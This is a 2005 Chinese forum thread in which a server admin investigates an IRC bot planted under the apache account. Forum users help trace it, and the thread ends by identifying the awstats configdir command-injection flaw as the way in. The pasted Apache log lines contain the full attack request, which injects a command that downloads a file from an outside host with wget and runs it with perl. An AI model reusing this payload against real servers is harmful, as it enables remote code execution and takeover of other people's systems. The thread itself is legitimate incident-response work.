m       7075  apache 1u  IPv4 5518264                TCP host-211-144-35-21.lingtu.com:34817->London2.UK.EU.undernet.org:ircd (ESTABLISHED)
m       7075  apache 3w  FIFO       0,5          5471032 pipe
m       7075  apache 4u  IPv4 5471035                UDP *:42991
m       7075  apache 22u  unix 0xc49384c0          4006028 socket

晨想 · 发表于 2005-6-21 12:30:03

看看命令历史文件。

root是不是弱口令？。。还有你的openssh之类的，是不是最新的，没root用户权限的程序，暂时不用考虑。。

顺便看看那些hak文件的内容。。

seedpig · 发表于 2005-6-21 13:39:45

对方没有获得root权限，但显然可以用apache的帐户作任何事(幸好对方还没有找到本地root进程的漏洞)，apache是2.0.51，查了一下，没发现有大的问题，不明白对方是怎么安装木马的，所以请教。

晨想 · 发表于 2005-6-21 23:32:32

1。apache 2.0.51，最好升级一下。
2。看看apache上的cgi，有没有漏洞。。这个也许才是问题。。
3。装木马，可以用cgi之类的上载，或PHP等。

看看apache的log。

没获得root，就好，从apache查吧。。。最好重新安装一次apache以及相关软件，并且升级。

seedpig · 发表于 2005-6-23 09:33:36

谢谢斑竹，已经封掉了对ircd的连接，正在查apache的日志

linyin · 发表于 2005-6-24 15:18:28

关注,查出来后麻烦帖份结果上来

seedpig · 发表于 2005-8-8 14:08:58

终于把这个德国鬼子揪出来了，是awstats的漏洞，用awstats的兄弟自己当心了。

日志里发现了这样的记录：

80.190.246.5 - - [01/Aug/2005:06:02:07 +0800] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20http://www.euro-for
m.com/zboard/sess_3539283e27d73cae29fe2b80f9293f50;perl%20sess_3539283e27d73cae29fe2b80f9293f50;echo%20;echo| HTTP/1.1" 404 29
7
80.190.246.5 - - [01/Aug/2005:06:02:08 +0800] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20http://www.euro-for
m.com/zboard/sess_3539283e27d73cae29fe2b80f9293f50;perl%20sess_3539283e27d73cae29fe2b80f9293f50;echo%20;echo| HTTP/1.1" 200 59
9

dancingpig · 发表于 2005-8-9 19:19:44

那ps应该没给改过吧
ps的修改权限应该是root的吧

seedpig · 发表于 2005-8-10 00:41:16

chkrootkit查过，没有问题，对方也没获得root权限

		自动登录	找回密码
密码			注册